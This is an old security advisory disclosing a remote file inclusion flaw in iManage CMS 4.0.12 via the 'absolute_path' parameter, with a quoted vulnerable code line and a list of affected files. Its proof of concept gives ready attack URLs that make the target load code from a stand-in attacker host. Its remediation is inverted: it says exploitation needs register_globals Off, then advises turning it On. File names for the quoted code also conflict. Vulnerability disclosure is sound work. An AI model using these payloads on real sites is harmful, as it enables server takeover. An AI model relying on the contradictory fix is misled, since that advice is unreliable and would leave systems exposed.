ECHO.OR.ID ECHO_ADV_40$2006 --------------------------------------------------------------------------------------------------- [ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion --------------------------------------------------------------------------------------------------- Author : Ahmad Maulana a.k.a Matdhule Date Found : July, 20th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ iManage CMS from Imaginex-Resource Application : iManage CMS version : 4.0.12 stable URL : http://www.imaginex-resource.com --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~~~ -----------------------component.php---------------------- .... <?php /** * iManage Version 4.0.12 * Dynamic portal server and Content managment engine * 03-02-2003 * * Copyright (C) 2000 - 2003 Imaginex-Resource * * Site Name: iManage Version 4.0.12 * File Name: rightComponent.php * Date: 31/01/2003 * Version #: 4.0.12 * Comments: Display all modules which are to be displayed on the right. **/ include($absolute_path.'/language/'.$lang.'/lang_components.php'); ... ---------------------------------------------------------- Input passed to the "absolute_path" parameter in insert.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources Affected files: articles.php contact.php displaypage.php faq.php mainbody.php news.php registration.php whosOnline.php components/com_calendar.php components/com_forum.php components/minibb/index.php components/minibb/bb_admin.php components/minibb/bb_plugins.php modules/mod_calendar.php modules/mod_browser_prefs.php modules/mod_counter.php modules/mod_online.php modules/mod_stats.php modules/mod_weather.php themes/bizz.php themes/default.php themes/simple.php themes/original.php themes/portal.php themes/purple.php and more :) Successful exploitation requires that "register_globals= Off ". Proof Of Concept: ~~~~~~~~~~~~~~~~~ http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt? http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt? and more Affected files Solution: ~~~~~~~~~ - Change register_globals= On in php.ini - Sanitize variable $absolute_path on affected files. --------------------------------------------------------------------------- Shoutz: ~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker@xxxxxxxxxxxxxxx, jasakom_perjuangan@xxxxxxxxxxxxxxx ~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------